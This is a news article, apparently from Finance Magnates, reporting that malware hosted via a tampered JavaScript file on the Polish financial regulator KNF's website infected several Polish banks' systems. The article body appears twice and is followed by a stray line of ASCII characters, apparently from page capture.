Banking Malware Attack Spotted in Poland, KNF’s Entire System Down

by Aziz Abdel-Qader
  • Experts believe that the issue can be traced back to the web server of the Polish regulator.
Banking Malware Attack Spotted in Poland, KNF’s Entire System Down
Finance Magnates
Join our Telegram channel

Prosecutors and other state security officials in Poland are investigating a hack, unprecedented in size, after discovering that workstations of some banks were Hosting malicious software that infected various banking systems, according to Polish media.

To unlock the Asian market, register now to the iFX EXPO in Hong Kong

[gptAdvertisement]

The news comes a few days after the Polish Financial Supervision Authority (KNF) took down its entire system in a cyber-attack believed to be “from another country” and the first ever to result in a service outage, according to a KNF spokesman.

Experts believe that the issue seems to have been traced back to the web server of the Polish regulator’s website where a modified JavaScript file allowed visitors to load an external JS file which then executed malicious payloads on selected targets.

According to local media, some financial institutions had seen unusual network traffic and found encrypted executables on several servers. The details were rapidly shared between the group of roughly 20 commercial banks in the country and other banks started reporting the same issues.

The Polish authorities confirmed that customer money was untouched and that no operations have been affected so far. However, they said that the whole situation is still under investigation, so things may change in the days to come as more information comes to light.

A little more than a year ago, a government department that deals with Cybersecurity confirmed that a few Polish commercial banks had been victims of a malware infection. The source of the executables, however, was the one entity they didn’t expect it from – the KNF.

At the time, the investigation suggested that the starting point for the infection could be the server of the Polish financial regulatory body. Overall, it is ironic that the website of the key institution responsible for assuring security in the financial sector was used to attack it.

Prosecutors and other state security officials in Poland are investigating a hack, unprecedented in size, after discovering that workstations of some banks were Hosting malicious software that infected various banking systems, according to Polish media.

To unlock the Asian market, register now to the iFX EXPO in Hong Kong

[gptAdvertisement]

The news comes a few days after the Polish Financial Supervision Authority (KNF) took down its entire system in a cyber-attack believed to be “from another country” and the first ever to result in a service outage, according to a KNF spokesman.

Experts believe that the issue seems to have been traced back to the web server of the Polish regulator’s website where a modified JavaScript file allowed visitors to load an external JS file which then executed malicious payloads on selected targets.

According to local media, some financial institutions had seen unusual network traffic and found encrypted executables on several servers. The details were rapidly shared between the group of roughly 20 commercial banks in the country and other banks started reporting the same issues.

The Polish authorities confirmed that customer money was untouched and that no operations have been affected so far. However, they said that the whole situation is still under investigation, so things may change in the days to come as more information comes to light.

A little more than a year ago, a government department that deals with Cybersecurity confirmed that a few Polish commercial banks had been victims of a malware infection. The source of the executables, however, was the one entity they didn’t expect it from – the KNF.

At the time, the investigation suggested that the starting point for the infection could be the server of the Polish financial regulatory body. Overall, it is ironic that the website of the key institution responsible for assuring security in the financial sector was used to attack it.

!"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|} !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}